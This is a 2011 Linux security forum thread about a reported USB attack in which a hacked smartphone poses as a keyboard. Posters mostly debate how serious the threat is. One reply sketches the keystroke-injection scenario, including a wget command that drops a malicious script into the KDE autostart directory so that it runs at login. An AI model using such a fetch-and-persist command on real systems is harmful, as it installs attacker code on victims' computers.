LinuxQuestions.org
View the Most Wanted LQ Wiki articles.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
LinkBack Search this Thread
Old 01-20-2011, 01:51 PM   #1
thorn168
Member
 
Registered: Oct 2004
Location: USA
Distribution: Vector Linux 5.1 Std., Vector Linux 5.8 Std., Win2k, XP, OS X (10.4 & 10.5)
Posts: 344

Rep: Reputation: 42
Zero day USB Threat


Hi Everyone,

Just wanted to share this zero day usb threat reported on Cnet.

It is reported to affect Linux Machines.

Here is the link:

http://news.cnet.com/8301-27080_3-20...CmoreStories.0
 
Old 01-20-2011, 02:07 PM   #2
jlinkels
Senior Member
 
Registered: Oct 2003
Location: Bonaire
Distribution: Debian Lenny/Squeeze/Wheezy/Sid
Posts: 3,980

Rep: Reputation: 476Reputation: 476Reputation: 476Reputation: 476Reputation: 476
Quote:
...wrote software that changes the functionality of the USB driver so that they could launch a surreptitious attack
It is not quite clear to me exactly what functionality has been added and where. Is it the USB driver of the host (= the machine to be compromised?) How would that be done?

Is it in the USB device? So if the USB device emulates a keyboard, so what? Would the risk be greater as an arbitrary keyboard connected to a Linux computer? Does the human interface get administrator rights by magic?

To me it looks a little bit like the author has once seen a Linux computer which did not pop up a window when a USB device was connected, and based on that drew the conclusion that a dangerous situation could arise. (Like the "warning! are you sure that you want to continue..." dialog boxes in Windows protect users from doing something stupid!)

jlinkels
 
Old 01-20-2011, 02:14 PM   #3
silvyus_06
Member
 
Registered: Oct 2010
Distribution: Ubuntu 10.04 , Linux Mint Debian Edition , Microsoft Windows 7
Posts: 386

Rep: Reputation: 49
and what can we do about that?
"oh, i know, don't use smartphones , their too smart asses" hhaahha
 
Old 01-20-2011, 02:47 PM   #4
H_TeXMeX_H
Guru
 
Registered: Oct 2005
Location: $RANDOM
Distribution: slackware64
Posts: 12,928
Blog Entries: 2

Rep: Reputation: 1266Reputation: 1266Reputation: 1266Reputation: 1266Reputation: 1266Reputation: 1266Reputation: 1266Reputation: 1266Reputation: 1266
I think they're hacking the computer using a charging phone ... this, of course, assumes that the phone was hacked. Meh, not that interesting. Why would I charge my phone with a usb port (in doesn't even have a USB port), and how would it get hacked ? This is more of a phone security issue, that happens to also affect computers connected to it.
 
Old 01-20-2011, 11:36 PM   #5
John VV
Guru
 
Registered: Aug 2005
Posts: 12,100

Rep: Reputation: 1583Reputation: 1583Reputation: 1583Reputation: 1583Reputation: 1583Reputation: 1583Reputation: 1583Reputation: 1583Reputation: 1583Reputation: 1583Reputation: 1583
it is turning the phone into a keyboard using a usb cable

when one plugs in the "hacked phone" it is seen as the keyboard and NOT as the phone
then the "new" keyboard has root access to the system and the payload can be inserted


but if you have physical access then this can be done by other means so...
Ars has a review of the cnet news
http://arstechnica.com/security/news...sb-drivers.ars
 
Old 01-21-2011, 12:00 AM   #6
jschiwal
Guru
 
Registered: Aug 2001
Location: Fargo, ND
Distribution: SuSE AMD64
Posts: 15,733

Rep: Reputation: 654Reputation: 654Reputation: 654Reputation: 654Reputation: 654Reputation: 654
John VV: Plugging in a usb keyboard device gives you a root shell?
 
Old 01-21-2011, 06:16 AM   #7
win32sux
Guru
 
Registered: Jul 2003
Location: Los Angeles
Distribution: Ubuntu
Posts: 9,870

Rep: Reputation: 371Reputation: 371Reputation: 371Reputation: 371
Extremely interesting vulnerability! Thanks for the link to the article!
 
Old 01-21-2011, 10:29 AM   #8
thorn168
Member
 
Registered: Oct 2004
Location: USA
Distribution: Vector Linux 5.1 Std., Vector Linux 5.8 Std., Win2k, XP, OS X (10.4 & 10.5)
Posts: 344

Original Poster
Rep: Reputation: 42
At first blush this exploit may not seem very threatening, but if you replace the smartphone with say an iPod or similar usb charging device, trouble could follow. In context who would have imagined that something like Stuxnet would be a threat as it specifically targeted only a very specific OS running a centrifuge.
 
Old 01-21-2011, 03:54 PM   #9
jlinkels
Senior Member
 
Registered: Oct 2003
Location: Bonaire
Distribution: Debian Lenny/Squeeze/Wheezy/Sid
Posts: 3,980

Rep: Reputation: 476Reputation: 476Reputation: 476Reputation: 476Reputation: 476
But then again, how does it work, and how does it work in Linux? Like I asked before, the article is by far not specific enough. Apparently you understand it well enough to consider it a threat, so please explain.

About Stuxnet: Infection of the PLC's was done thru infecting Windows PC's. Siemens (the PLC manufacturer) builds industrial equipment based on proprietary hardware, but relies for both development and user interface fully on Windows. Not even hardened or embedded Windows, but plain commercial desktop XP. Many protocols between PLC's and Windows are proprietary, and only available on Windows. I gather it to be not that difficult to infect a Windows PC and then, while there are already open connections between PC's and PLC's to use these connections to crack the PLC. The development protocols go much further than just oploading the software, and deeply affect the running PLC both in code and data. The originality in this Stuxnet attack was that it was focused at just one installation. Not that a PLC was infected thru a PC, and cracking the PLC is not that difficult. If it was really the US and Israel governments behind this attack they had plenty of resources to develop such tools.

jlinkels
 
Old 01-21-2011, 08:34 PM   #10
win32sux
Guru
 
Registered: Jul 2003
Location: Los Angeles
Distribution: Ubuntu
Posts: 9,870

Rep: Reputation: 371Reputation: 371Reputation: 371Reputation: 371
Quote:
Originally Posted by jlinkels View Post
It is not quite clear to me exactly what functionality has been added and where. Is it the USB driver of the host (= the machine to be compromised?) How would that be done?

Is it in the USB device? So if the USB device emulates a keyboard, so what? Would the risk be greater as an arbitrary keyboard connected to a Linux computer? Does the human interface get administrator rights by magic?

To me it looks a little bit like the author has once seen a Linux computer which did not pop up a window when a USB device was connected, and based on that drew the conclusion that a dangerous situation could arise. (Like the "warning! are you sure that you want to continue..." dialog boxes in Windows protect users from doing something stupid!)
Quote:
Originally Posted by jlinkels View Post
But then again, how does it work, and how does it work in Linux? Like I asked before, the article is by far not specific enough. Apparently you understand it well enough to consider it a threat, so please explain.
The attack code makes the smartphone pretend to be a keyboard/mouse. This allow for really nasty stuff to be done (while the smartphone is innocently being charged/whatever), such as copying your personal documents or planting incriminating evidence on your computer. While this doesn't on its own get the bad guy privilege escalation, a root exploit can be part of the attack payload if he/she desires.

Last edited by win32sux; 01-21-2011 at 08:40 PM.
 
Old 01-22-2011, 04:55 AM   #11
cepheus11
Member
 
Registered: Nov 2010
Location: Germany
Distribution: gentoo
Posts: 50

Rep: Reputation: 15
Quote:
Originally Posted by jlinkels View Post
But then again, how does it work, and how does it work in Linux?
I can imagine the following scenario: I use KDE. The shortcut for the "Run" dialog in KDE ist Alt-F2. The autostart directory for users is ~/.kde4/Autostart. The USB stick or smartphone could register as a keyboard. Then it sends "Press Alt" - "Press F2" - "Release F2" - "Release Alt", followed by "wget --directory-prefix=~/.kde4/Autostart (URL to malicious script)" and "Enter". Next time I login, (malicious script) is executed (details like x permissions ignored here). I can see this on the screen, if I watch.

I don't consider this a real (or new) threat for me, because someone with physical access could simply do this by hand anyway. A smartphone needs to be really hacked - not just have an app installed. I don't think the app API exposes the USB driver stack to spoof the device class.

Read the discussion thread on the arstechnica article, there are some more ideas how this could be turned into a real threat.

Last edited by cepheus11; 01-22-2011 at 05:00 AM. Reason: typo
 
Old 01-22-2011, 05:58 AM   #12
eSelix
Senior Member
 
Registered: Oct 2009
Location: Wroclaw, Poland
Distribution: Kubuntu
Posts: 1,189

Rep: Reputation: 301Reputation: 301Reputation: 301Reputation: 301
Interesting. The main reason of existence of this threat is that devices connected to USB port are not authenticated by user. It is compromise between comfort (just plug and use) and security. The USB drivers should get option to authenticate, but I don't known how one device can be distinguished by other, but the same model. So for now all devices presenting itself as keyboard or mouse should be paused (by driver) to access computer until user of this computer allow them to connect. The meantime we should not connect untrusted devices.

Last edited by eSelix; 01-22-2011 at 06:00 AM.
 
Old 01-22-2011, 06:54 AM   #13
jlinkels
Senior Member
 
Registered: Oct 2003
Location: Bonaire
Distribution: Debian Lenny/Squeeze/Wheezy/Sid
Posts: 3,980

Rep: Reputation: 476Reputation: 476Reputation: 476Reputation: 476Reputation: 476
Well, I still fail to see the reason for the excitement in this article. A USB device is connected to a computer and emulates a keyboard. So? It is since long known exactly what risks are imposed when one has physical access to a Linux computer. One can reboot the machine and gain root access. But that is not the case here.

What is the difference between a remote SSH connection and an emulated keyboard? What is the difference between an e-mail with malicious content which can be run with user credentials and an emulated keyboard wedging in characters using the same user credentials?

As far as I understand this exploit does not enable the change of the USB driver present on the host (the computer to be infected), does it? It would be different if the USB device would provide its own driver, which is in turn using root credentials is installed by the host.

jlinkels
 
Old 01-22-2011, 08:44 AM   #14
cepheus11
Member
 
Registered: Nov 2010
Location: Germany
Distribution: gentoo
Posts: 50

Rep: Reputation: 15
Quote:
Originally Posted by jlinkels View Post
What is the difference between a remote SSH connection and an emulated keyboard? What is the difference between an e-mail with malicious content which can be run with user credentials and an emulated keyboard wedging in characters using the same user credentials?
Active contents in e-mails/web pages are even more dangerous because they come remotely and can run completely unnoticed, but they require a security hole or user interaction.

But yes, the real-life threat level of this exploit is often exaggerated.
 
Old 01-25-2011, 03:23 PM   #15
thorn168
Member
 
Registered: Oct 2004
Location: USA
Distribution: Vector Linux 5.1 Std., Vector Linux 5.8 Std., Win2k, XP, OS X (10.4 & 10.5)
Posts: 344

Original Poster
Rep: Reputation: 42
I realized that I know how someone with bad intentions could exploit this vulnerability to do bad things, but, I decline to provide this information because I do not wish to inspire those with bad intentions to "publish" a proof of concept.

Some things should just not be public knowledge.
 
  


Reply

Tags
arbitrary code, automount, usb, zero day threat


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off
Trackbacks are Off
Pingbacks are On
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
OpenOffice.org Calc formula to check if day is last day of the month win32sux Linux - Software 1 01-19-2009 12:38 PM
Hi! Using rock solid Debian Etch, day to day, I'm investigating Lenny using another BillAp Linux - Newbie 2 11-26-2008 09:51 AM
LXer: Day 3 at OLS: NFS, USB, AppArmor, and the Linux Standard Base LXer Syndicated Linux News 0 07-22-2006 04:54 PM
Wireless USB dongle: Have to run YaST every day lagu2653 Linux - Wireless Networking 0 11-26-2005 06:32 AM
USB mouse hangs about once a day, needs to be replugged blimbo Linux - Hardware 3 08-14-2004 08:32 PM


All times are GMT -5. The time now is 05:08 PM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration